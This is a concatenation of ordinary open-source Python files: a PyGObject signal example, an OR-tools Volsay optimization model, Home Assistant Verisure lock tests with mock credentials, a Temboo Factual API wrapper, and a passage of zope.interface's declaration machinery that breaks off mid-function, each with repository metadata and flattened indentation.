| GbalsaC/bitnamiP | xqueue/queue/util.py | Python | agpl-3.0 | 402 |
from __future__ import print_function
from gi.repository import GObject
class C(GObject.GObject):
@GObject.Signal(arg_types=(int,))
def my_signal(self, arg):
"""Decorator style signal which uses the method name as signal name and
the method as the closure.
Note that with python3 annotations can be used for argument types as follows:
@GObject.Signal
def my_signal(self, arg:int):
pass
"""
print("C: class closure for `my_signal' called with argument", arg)
@GObject.Signal
def noarg_signal(self):
"""Decoration of a signal using all defaults and no arguments."""
print("C: class closure for `noarg_signal' called")
class D(C):
def do_my_signal(self, arg):
print("D: class closure for `my_signal' called. Chaining up to C")
C.my_signal(self, arg)
def my_signal_handler(obj, arg, *extra):
print("handler for `my_signal' called with argument", arg, "and extra args", extra)
inst = C()
inst2 = D()
inst.connect("my_signal", my_signal_handler, 1, 2, 3)
inst.connect("noarg_signal", my_signal_handler, 1, 2, 3)
inst.emit("my_signal", 42)
inst.emit("noarg_signal")
inst2.emit("my_signal", 42)
| GNOME/pygobject | examples/signal.py | Python | lgpl-2.1 | 1,236 |
# Copyright 2011 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in Google or-tools.
From the OPL model volsay.mod
Using arrays.
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from __future__ import print_function
from ortools.linear_solver import pywraplp
def main(unused_argv):
# Create the solver.
# using GLPK
# solver = pywraplp.Solver('CoinsGridGLPK',
# pywraplp.Solver.GLPK_LINEAR_PROGRAMMING)
# Using CLP
solver = pywraplp.Solver('CoinsGridCLP',
pywraplp.Solver.CLP_LINEAR_PROGRAMMING)
# data
num_products = 2
Gas = 0
Chloride = 1
products = ['Gas', 'Chloride']
# declare variables
production = [solver.NumVar(0, 100000, 'production[%i]' % i)
for i in range(num_products)]
#
# constraints
#
solver.Add(production[Gas] + production[Chloride] <= 50)
solver.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)
# objective
objective = solver.Maximize(40 * production[Gas] + 50 * production[Chloride])
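  # For reference, the model in algebraic form (restating the code above):
  #   maximize    40*Gas + 50*Chloride
  #   subject to   1*Gas +  1*Chloride <=  50
  #                3*Gas +  4*Chloride <= 180
  #                0 <= production[i] <= 100000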
print('NumConstraints:', solver.NumConstraints())
#
# solution and search
#
solver.Solve()
print()
print('objective = ', solver.Objective().Value())
for i in range(num_products):
print(products[i], '=', production[i].SolutionValue(), end=' ')
print('ReducedCost = ', production[i].ReducedCost())
if __name__ == '__main__':
main('Volsay')
| WendellDuncan/or-tools | examples/python/volsay2.py | Python | apache-2.0 | 2,080 |
"""Tests for the Verisure platform."""
from contextlib import contextmanager
from unittest.mock import call, patch
from homeassistant.components.lock import (
DOMAIN as LOCK_DOMAIN,
SERVICE_LOCK,
SERVICE_UNLOCK,
)
from homeassistant.components.verisure import DOMAIN as VERISURE_DOMAIN
from homeassistant.const import STATE_UNLOCKED
from homeassistant.setup import async_setup_component
NO_DEFAULT_LOCK_CODE_CONFIG = {
"verisure": {
"username": "test",
"password": "test",
"locks": True,
"alarm": False,
"door_window": False,
"hygrometers": False,
"mouse": False,
"smartplugs": False,
"thermometers": False,
"smartcam": False,
}
}
DEFAULT_LOCK_CODE_CONFIG = {
"verisure": {
"username": "test",
"password": "test",
"locks": True,
"default_lock_code": "9999",
"alarm": False,
"door_window": False,
"hygrometers": False,
"mouse": False,
"smartplugs": False,
"thermometers": False,
"smartcam": False,
}
}
LOCKS = ["door_lock"]
@contextmanager
def mock_hub(config, get_response=LOCKS[0]):
"""Extensively mock out a verisure hub."""
hub_prefix = "homeassistant.components.verisure.lock.hub"
# Since there is no conf to disable ethernet status, mock hub for
# binary sensor too
hub_binary_sensor = "homeassistant.components.verisure.binary_sensor.hub"
verisure_prefix = "verisure.Session"
with patch(verisure_prefix) as session, patch(hub_prefix) as hub:
session.login.return_value = True
hub.config = config["verisure"]
hub.get.return_value = LOCKS
hub.get_first.return_value = get_response.upper()
hub.session.set_lock_state.return_value = {
"doorLockStateChangeTransactionId": "test"
}
hub.session.get_lock_state_transaction.return_value = {"result": "OK"}
with patch(hub_binary_sensor, hub):
yield hub
async def setup_verisure_locks(hass, config):
"""Set up mock verisure locks."""
with mock_hub(config):
await async_setup_component(hass, VERISURE_DOMAIN, config)
await hass.async_block_till_done()
# lock.door_lock, ethernet_status
assert len(hass.states.async_all()) == 2
async def test_verisure_no_default_code(hass):
"""Test configs without a default lock code."""
await setup_verisure_locks(hass, NO_DEFAULT_LOCK_CODE_CONFIG)
with mock_hub(NO_DEFAULT_LOCK_CODE_CONFIG, STATE_UNLOCKED) as hub:
mock = hub.session.set_lock_state
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_count == 0
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock", "code": "12345"}
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "lock")
mock.reset_mock()
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_UNLOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_count == 0
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_UNLOCK,
{"entity_id": "lock.door_lock", "code": "12345"},
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "unlock")
async def test_verisure_default_code(hass):
"""Test configs with a default lock code."""
await setup_verisure_locks(hass, DEFAULT_LOCK_CODE_CONFIG)
with mock_hub(DEFAULT_LOCK_CODE_CONFIG, STATE_UNLOCKED) as hub:
mock = hub.session.set_lock_state
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_args == call("9999", LOCKS[0], "lock")
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_UNLOCK, {"entity_id": "lock.door_lock"}
)
await hass.async_block_till_done()
assert mock.call_args == call("9999", LOCKS[0], "unlock")
await hass.services.async_call(
LOCK_DOMAIN, SERVICE_LOCK, {"entity_id": "lock.door_lock", "code": "12345"}
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "lock")
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_UNLOCK,
{"entity_id": "lock.door_lock", "code": "12345"},
)
await hass.async_block_till_done()
assert mock.call_args == call("12345", LOCKS[0], "unlock")
| partofthething/home-assistant | tests/components/verisure/test_lock.py | Python | apache-2.0 | 4,819 |
# -*- coding: utf-8 -*-
###############################################################################
#
# FilterPlacesByTopLevelCategory
# Find places by top-level category and near specified latitude, longitude coordinates.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FilterPlacesByTopLevelCategory Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, '/Library/Factual/FilterPlacesByTopLevelCategory')
def new_input_set(self):
return FilterPlacesByTopLevelCategoryInputSet()
def _make_result_set(self, result, path):
return FilterPlacesByTopLevelCategoryResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
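# Example usage (a sketch; the session credentials and input values below are
# placeholders, not part of this generated file):
#   from temboo.core.session import TembooSession
#   session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = FilterPlacesByTopLevelCategory(session)
#   inputs = choreo.new_input_set()
#   inputs.set_Category('Food & Beverage')
#   inputs.set_Latitude(40.73)
#   inputs.set_Longitude(-73.99)
#   inputs.set_Radius(500)
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())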
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)
def set_Category(self, value):
"""
Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)
def set_Latitude(self, value):
"""
Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)
def set_Longitude(self, value):
"""
Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)
def set_Radius(self, value):
"""
Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FilterPlacesByTopLevelCategory Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Factual.)
"""
return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FilterPlacesByTopLevelCategoryResultSet(response, path)
| jordanemedlock/psychtruths | temboo/core/Library/Factual/FilterPlacesByTopLevelCategory.py | Python | apache-2.0 | 5,132 |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""Implementation of interface declarations
There are three flavors of declarations:
- Declarations are used to simply name declared interfaces.
- ImplementsDeclarations are used to express the interfaces that a
class implements (that instances of the class provides).
Implements specifications support inheriting interfaces.
- ProvidesDeclarations are used to express interfaces directly
provided by objects.
"""
from __future__ import absolute_import
__docformat__ = 'restructuredtext'
import sys
from types import FunctionType
from types import MethodType
from types import ModuleType
import weakref
from . import advice as advicemod
from .interface import InterfaceClass
from .interface import SpecificationBase
from .interface import Specification
from ._compat import CLASS_TYPES as DescriptorAwareMetaClasses
from ._compat import PYTHON3
# Registry of class-implementation specifications
BuiltinImplementationSpecifications = {}
_ADVICE_ERROR = ('Class advice impossible in Python3. '
'Use the @%s class decorator instead.')
_ADVICE_WARNING = ('The %s API is deprecated, and will not work in Python3 '
'Use the @%s class decorator instead.')
class named(object):
def __init__(self, name):
self.name = name
def __call__(self, ob):
ob.__component_name__ = self.name
return ob
class Declaration(Specification):
"""Interface declarations"""
def __init__(self, *interfaces):
Specification.__init__(self, _normalizeargs(interfaces))
def changed(self, originally_changed):
Specification.changed(self, originally_changed)
try:
del self._v_attrs
except AttributeError:
pass
def __contains__(self, interface):
"""Test whether an interface is in the specification
"""
return self.extends(interface) and interface in self.interfaces()
def __iter__(self):
"""Return an iterator for the interfaces in the specification
"""
return self.interfaces()
def flattened(self):
"""Return an iterator of all included and extended interfaces
"""
return iter(self.__iro__)
def __sub__(self, other):
"""Remove interfaces from a specification
"""
return Declaration(
*[i for i in self.interfaces()
if not [j for j in other.interfaces()
if i.extends(j, 0)]
]
)
def __add__(self, other):
"""Add two specifications or a specification and an interface
"""
seen = {}
result = []
for i in self.interfaces():
seen[i] = 1
result.append(i)
for i in other.interfaces():
if i not in seen:
seen[i] = 1
result.append(i)
return Declaration(*result)
__radd__ = __add__
##############################################################################
#
# Implementation specifications
#
# These specify interfaces implemented by instances of classes
class Implements(Declaration):
# class whose specification should be used as additional base
inherit = None
# interfaces actually declared for a class
declared = ()
__name__ = '?'
@classmethod
def named(cls, name, *interfaces):
# Implementation method: Produce an Implements interface with
# a fully fleshed out __name__ before calling the constructor, which
# sets bases to the given interfaces and which may pass this object to
# other objects (e.g., to adjust dependents). If they're sorting or comparing
# by name, this needs to be set.
inst = cls.__new__(cls)
inst.__name__ = name
inst.__init__(*interfaces)
return inst
def __repr__(self):
return '<implementedBy %s>' % (self.__name__)
def __reduce__(self):
return implementedBy, (self.inherit, )
def __cmp(self, other):
# Yes, I did mean to name this __cmp, rather than __cmp__.
# It is a private method used by __lt__ and __gt__.
# This is based on, and compatible with, InterfaceClass.
# (The two must be mutually comparable to be able to work in e.g., BTrees.)
# Instances of this class generally don't have a __module__ other than
# `zope.interface.declarations`, whereas they *do* have a __name__ that is the
# fully qualified name of the object they are representing.
# Note, though, that equality and hashing are still identity based. This
# accounts for things like nested objects that have the same name (typically
# only in tests) and is consistent with pickling. As far as comparisons to InterfaceClass
# goes, we'll never have equal name and module to those, so we're still consistent there.
# Instances of this class are essentially intended to be unique and are
# heavily cached (note how our __reduce__ handles this) so having identity
# based hash and eq should also work.
if other is None:
return -1
n1 = (self.__name__, self.__module__)
n2 = (getattr(other, '__name__', ''), getattr(other, '__module__', ''))
# This spelling works under Python3, which doesn't have cmp().
return (n1 > n2) - (n1 < n2)
def __hash__(self):
return Declaration.__hash__(self)
# We want equality to be based on identity. However, we can't actually
# implement __eq__/__ne__ to do this because sometimes we get wrapped in a proxy.
# We need to let the proxy types implement these methods so they can handle unwrapping
# and then rely on: (1) the interpreter automatically changing `implements == proxy` into
# `proxy == implements` (which will call proxy.__eq__ to do the unwrapping) and then
# (2) the default equality semantics being identity based.
def __lt__(self, other):
c = self.__cmp(other)
return c < 0
def __le__(self, other):
c = self.__cmp(other)
return c <= 0
def __gt__(self, other):
c = self.__cmp(other)
return c > 0
def __ge__(self, other):
c = self.__cmp(other)
return c >= 0
def _implements_name(ob):
# Return the __name__ attribute to be used by its __implemented__
# property.
# This must be stable for the "same" object across processes
# because it is used for sorting. It needn't be unique, though, in cases
# like nested classes named Foo created by different functions, because
# equality and hashing is still based on identity.
# It might be nice to use __qualname__ on Python 3, but that would produce
# different values between Py2 and Py3.
return (getattr(ob, '__module__', '?') or '?') + \
'.' + (getattr(ob, '__name__', '?') or '?')
def implementedByFallback(cls):
"""Return the interfaces implemented for a class' instances
The value returned is an IDeclaration.
"""
try:
spec = cls.__dict__.get('__implemented__')
except AttributeError:
# we can't get the class dict. This is probably due to a
# security proxy. If this is the case, then probably no
# descriptor was installed for the class.
# We don't want to depend directly on zope.security in
# zope.interface, but we'll try to make reasonable
# accommodations in an indirect way.
# We'll check to see if there's an implements:
spec = getattr(cls, '__implemented__', None)
if spec is None:
# There's no spec stored in the class. Maybe it's a builtin:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
return _empty
if spec.__class__ == Implements:
# we defaulted to _empty or there was a spec. Good enough.
# Return it.
return spec
# TODO: need old style __implements__ compatibility?
# Hm, there's an __implemented__, but it's not a spec. Must be
# an old-style declaration. Just compute a spec for it
return Declaration(*_normalizeargs((spec, )))
if isinstance(spec, Implements):
return spec
if spec is None:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
# TODO: need old style __implements__ compatibility?
spec_name = _implements_name(cls)
if spec is not None:
# old-style __implemented__ = foo declaration
spec = (spec, ) # tuplefy, as it might be just an int
spec = Implements.named(spec_name, *_normalizeargs(spec))
spec.inherit = None # old-style implies no inherit
del cls.__implemented__ # get rid of the old-style declaration
else:
try:
bases = cls.__bases__
except AttributeError:
if not callable(cls):
raise TypeError("ImplementedBy called for non-factory", cls)
bases = ()
spec = Implements.named(spec_name, *[implementedBy(c) for c in bases])
spec.inherit = cls
try:
cls.__implemented__ = spec
if not hasattr(cls, '__providedBy__'):
cls.__providedBy__ = objectSpecificationDescriptor
if (isinstance(cls, DescriptorAwareMetaClasses)
and
'__provides__' not in cls.__dict__):
# Make sure we get a __provides__ descriptor
cls.__provides__ = ClassProvides(
cls,
getattr(cls, '__class__', type(cls)),
)
except TypeError:
if not isinstance(cls, type):
raise TypeError("ImplementedBy called for non-type", cls)
BuiltinImplementationSpecifications[cls] = spec
return spec
implementedBy = implementedByFallback
def classImplementsOnly(cls, *interfaces):
"""Declare the only interfaces implemented by instances of a class
The arguments after the class are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace any previous declarations.
"""
spec = implementedBy(cls)
spec.declared = ()
spec.inherit = None
classImplements(cls, *interfaces)
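# Illustrative sketch (added; IFoo and IBar are hypothetical interfaces): because
# classImplementsOnly clears both `declared` and `inherit` above, interfaces
# picked up from base classes are dropped along with earlier declarations.
#
#   class Base(object):
#       pass
#   classImplements(Base, IBar)
#
#   class Derived(Base):
#       pass
#   classImplementsOnly(Derived, IFoo)
#   # IFoo.implementedBy(Derived) -> True
#   # IBar.implementedBy(Derived) -> False (no longer inherited)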
def classImplements(cls, *interfaces):
"""Declare additional interfaces implemented for instances of a class
The arguments after the class are one or more interfaces or
interface specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
are added to any interfaces previously declared.
"""
spec = implementedBy(cls)
spec.declared += tuple(_normalizeargs(interfaces))
# compute the bases
bases = []
seen = {}
for b in spec.declared:
if b not in seen:
seen[b] = 1
bases.append(b)
if spec.inherit is not None:
for c in spec.inherit.__bases__:
b = implementedBy(c)
if b not in seen:
seen[b] = 1
bases.append(b)
spec.__bases__ = tuple(bases)
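# Illustrative sketch (added; IFoo is a hypothetical interface created with the
# usual zope.interface machinery): declaring an interface for a class after the
# fact, which is what the implementer decorator below ultimately does as well.
#
#   class C(object):
#       pass
#   classImplements(C, IFoo)
#   # implementedBy(C) now includes IFoo, so IFoo.providedBy(C()) is True.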
def _implements_advice(cls):
interfaces, classImplements = cls.__dict__['__implements_advice_data__']
del cls.__implements_advice_data__
classImplements(cls, *interfaces)
return cls
class implementer:
"""Declare the interfaces implemented by instances of a class.
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
@implementer(I1)
class C(object):
pass
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, DescriptorAwareMetaClasses):
classImplements(ob, *self.interfaces)
return ob
spec_name = _implements_name(ob)
spec = Implements.named(spec_name, *self.interfaces)
try:
ob.__implemented__ = spec
except AttributeError:
raise TypeError("Can't declare implements", ob)
return ob
class implementer_only:
"""Declare the only interfaces implemented by instances of a class
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
@implementer_only(I1)
class C(object): pass
is equivalent to calling::
classImplementsOnly(C, I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, (FunctionType, MethodType)):
# XXX Does this decorator make sense for anything but classes?
# I don't think so. There can be no inheritance of interfaces
# on a method or function.
raise ValueError('The implementer_only decorator is not '
'supported for methods or functions.')
else:
# Assume it's a class:
classImplementsOnly(ob, *self.interfaces)
return ob
def _implements(name, interfaces, classImplements):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
frame = sys._getframe(2)
locals = frame.f_locals
# Try to make sure we were called from a class def. In 2.2.0 we can't
# check for __module__ since it doesn't seem to be added to the locals
# until later on.
if locals is frame.f_globals or '__module__' not in locals:
raise TypeError(name+" can be used only from a class definition.")
if '__implements_advice_data__' in locals:
raise TypeError(name+" can be used only once in a class definition.")
locals['__implements_advice_data__'] = interfaces, classImplements
advicemod.addClassAdvisor(_implements_advice, depth=3)
def implements(*interfaces):
"""Declare interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
implements(I1)
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer')
_implements("implements", interfaces, classImplements)
def implementsOnly(*interfaces):
"""Declare the only interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
implementsOnly(I1)
is equivalent to calling::
classImplementsOnly(C, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer_only')
_implements("implementsOnly", interfaces, classImplementsOnly)
##############################################################################
#
# Instance declarations
class Provides(Declaration): # Really named ProvidesClass
"""Implement __provides__, the instance-specific specification
When an object is pickled, we pickle the interfaces that it implements.
"""
def __init__(self, cls, *interfaces):
self.__args = (cls, ) + interfaces
self._cls = cls
Declaration.__init__(self, *(interfaces + (implementedBy(cls), )))
def __reduce__(self):
return Provides, self.__args
__module__ = 'zope.interface'
def __get__(self, inst, cls):
"""Make sure that a class __provides__ doesn't leak to an instance
"""
if inst is None and cls is self._cls:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object, but only if we are
# being called on the same class that we were defined for:
return self
raise AttributeError('__provides__')
ProvidesClass = Provides
# Registry of instance declarations
# This is a memory optimization to allow objects to share specifications.
InstanceDeclarations = weakref.WeakValueDictionary()
def Provides(*interfaces):
"""Cache instance declarations
Instance declarations are shared among instances that have the same
declaration. The declarations are cached in a weak value dictionary.
"""
spec = InstanceDeclarations.get(interfaces)
if spec is None:
spec = ProvidesClass(*interfaces)
InstanceDeclarations[interfaces] = spec
return spec
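# Note (added): because InstanceDeclarations is a WeakValueDictionary, repeated
# calls such as Provides(SomeClass, IFoo) return the same cached ProvidesClass
# instance only while a strong reference to it is still alive; once the last
# reference goes away the entry is collected and the next call builds a fresh
# object. (SomeClass and IFoo are hypothetical names used for illustration.)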
Provides.__safe_for_unpickling__ = True
def directlyProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace interfaces previously declared for the object.
"""
cls = getattr(object, '__class__', None)
if cls is not None and getattr(cls, '__class__', None) is cls:
# It's a meta class (well, at least it could be an extension class)
# Note that we can't get here from Py3k tests: there is no normal
# class which isn't descriptor aware.
if not isinstance(object,
DescriptorAwareMetaClasses):
raise TypeError("Attempt to make an interface declaration on a "
"non-descriptor-aware class")
interfaces = _normalizeargs(interfaces)
if cls is None:
cls = type(object)
issub = False
for damc in DescriptorAwareMetaClasses:
if issubclass(cls, damc):
issub = True
break
if issub:
# we have a class or type. We'll use a special descriptor
# that provides some extra caching
object.__provides__ = ClassProvides(object, cls, *interfaces)
else:
object.__provides__ = Provides(cls, *interfaces)
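# Illustrative sketch (added; SomeClass, IFoo and IBar are hypothetical):
# directlyProvides replaces only the object's own declarations and leaves the
# class declaration alone.
#
#   obj = SomeClass()              # assume SomeClass implements IFoo
#   directlyProvides(obj, IBar)
#   # IBar.providedBy(obj) -> True   (direct declaration on the instance)
#   # IFoo.providedBy(obj) -> True   (still provided via the class)
#   directlyProvides(obj)          # calling with no interfaces clears them again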
def alsoProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications) are
added to the interfaces previously declared for the object.
"""
directlyProvides(object, directlyProvidedBy(object), *interfaces)
def noLongerProvides(object, interface):
""" Removes a directly provided interface from an object.
"""
directlyProvides(object, directlyProvidedBy(object) - interface)
if interface.providedBy(object):
raise ValueError("Can only remove directly provided interfaces.")
class ClassProvidesBaseFallback(object):
def __get__(self, inst, cls):
if cls is self._cls:
# We only work if called on the class we were defined for
if inst is None:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object as is:
return self
return self._implements
raise AttributeError('__provides__')
ClassProvidesBasePy = ClassProvidesBaseFallback # BBB
ClassProvidesBase = ClassProvidesBaseFallback
# Try to get C base:
try:
from ._zope_interface_coptimizations import ClassProvidesBase
except ImportError:
pass
class ClassProvides(Declaration, ClassProvidesBase):
"""Special descriptor for class __provides__
The descriptor caches the implementedBy info, so that
we can get declarations for objects without instance-specific
interfaces a bit quicker.
"""
def __init__(self, cls, metacls, *interfaces):
self._cls = cls
self._implements = implementedBy(cls)
self.__args = (cls, metacls, ) + interfaces
Declaration.__init__(self, *(interfaces + (implementedBy(metacls), )))
def __reduce__(self):
return self.__class__, self.__args
# Copy base-class method for speed
__get__ = ClassProvidesBase.__get__
def directlyProvidedBy(object):
"""Return the interfaces directly provided by the given object
The value returned is an ``IDeclaration``.
"""
provides = getattr(object, "__provides__", None)
if (provides is None # no spec
or
# We might have gotten the implements spec, as an
# optimization. If so, it's like having only one base, that we
# lop off to exclude class-supplied declarations:
isinstance(provides, Implements)
):
return _empty
# Strip off the class part of the spec:
return Declaration(provides.__bases__[:-1])
def classProvides(*interfaces):
"""Declare interfaces provided directly by a class
This function is called in a class definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications)
are used to create the class's direct-object interface specification.
An error will be raised if the class already has a direct interface
specification. In other words, it is an error to call this function more
than once in a class definition.
Note that the given interfaces have nothing to do with the interfaces
implemented by instances of the class.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides for a class. For example::
classProvides(I1)
is equivalent to calling::
directlyProvides(theclass, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'provider')
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a class def
if (locals is frame.f_globals) or ('__module__' not in locals):
raise TypeError("classProvides can be used only from a "
"class definition.")
if '__provides__' in locals:
raise TypeError(
"classProvides can only be used once in a class definition.")
locals["__provides__"] = _normalizeargs(interfaces)
advicemod.addClassAdvisor(_classProvides_advice, depth=2)
def _classProvides_advice(cls):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
interfaces = cls.__dict__['__provides__']
del cls.__provides__
directlyProvides(cls, *interfaces)
return cls
class provider:
"""Class decorator version of classProvides"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
directlyProvides(ob, *self.interfaces)
return ob
def moduleProvides(*interfaces):
"""Declare interfaces provided by a module
This function is used in a module definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications) are
used to create the module's direct-object interface specification. An
error will be raised if the module already has an interface specification.
In other words, it is an error to call this function more than once in a
module definition.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides. For example::
moduleProvides(I1)
is equivalent to::
directlyProvides(sys.modules[__name__], I1)
"""
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a module body
if (locals is not frame.f_globals) or ('__name__' not in locals):
raise TypeError(
"moduleProvides can only be used from a module definition.")
if '__provides__' in locals:
raise TypeError(
"moduleProvides can only be used once in a module definition.")
locals["__provides__"] = Provides(ModuleType,
*_normalizeargs(interfaces))
##############################################################################
#
# Declaration querying support
# XXX: is this a fossil? Nobody calls it, no unit tests exercise it, no
# doctests import it, and the package __init__ doesn't import it.
def ObjectSpecification(direct, cls):
"""Provide object specifications
These combine information for the object and for its classes.
"""
return Provides(cls, direct) # pragma: no cover fossil
def getObjectSpecificationFallback(ob):
provides = getattr(ob, '__provides__', None)
if provides is not None:
